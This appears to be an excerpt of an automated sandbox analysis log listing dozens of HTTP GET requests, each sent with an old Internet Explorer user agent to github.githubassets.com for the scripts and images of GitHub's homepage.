Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-6faacedf87fe.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/behaviors-b32b736e8b72.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/notifications-global-54f34167118d.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-bae876-1e5b19a38261.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/marketing-872ff8663359.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/marketing-experiments-6794cdd7dce1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/home-fa7c9cc8a53c.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/webgl-globe-b8ac95da6496.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_webgl-globe_dist_js_main_js-7ace716f3606.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/react-lib-7b7b5264f6c1.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_primer_react_lib-esm_Fea-39267a-9ffd541aafbc.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-f36ad879d477.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_js-e39b44f27fbb.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-540a2acf621f.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_KeybindingHint_KeybindingHint_js-node_modules_githu-3fe5e5-779b0a7957e4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Dialog_Dialog_js-node_modules_primer_react_lib-esm_-34d71e-a36ca1cac968.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-ffb979-ed6ff1fbeca4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/keyboard-shortcuts-dialog-3d3b90edc171.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sessions-f3ddee0032e4.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/thumbnail-31b2a20df6fc.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/play-1844e8414ade.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/hero-desktop-a38b0fd77b6c.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/hero-mobile-7163f4f5de41.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/3m-0151c2fda0ce.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/kpmg-c249f20c5173.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sap-96248a56d312.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/mercedes-fcf97d2d6ec4.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/pg-f1f19955c4e4.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/telus-df0c2109df99.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-0-df97fa6b0c27.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-copilot-editor-6474457a5b19.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-1-c219318e479a.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-productivity-c304b83d09c7.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-copilot-sidebar-3d2efb504577.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/bg-glow-purple-6e9a6a96cb04.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-actions-2-c5178134f381.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-codespaces-1d2d17e8b2b7.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-mobile-chat-9e7549906574.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-2-f30dcc9bd35c.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-security-2-f6a799957581.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-ghas-list-84af1f1ce2b8.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/bg-glow-blue-036b8dc2d1ce.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-dependabot-d98c73cc6724.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-code-scanning-fc9dfb212aa3.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-3-9e542b5c31b8.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-secret-scanning-2-88fb429376d6.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-collaboration-2-e46b1fb1d363.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/issues-plan-2-46d1ce1d4519.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-projects-2-26077f1dd188.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-discussions-2-b915a6dd867e.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-pull-requests-2-280cc958fc05.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/directus-4da9e46da0ac.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/commandpost-18d45fffda67.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/chaynhq-4c5953025dca.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/imolorhe-9d771b1d4332.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dayhaysoos-c50659cac73b.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/yyx990803-e11c7b140b17.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/eslint-33bd6140c37f.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sindresorhus-d3224f241a4d.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
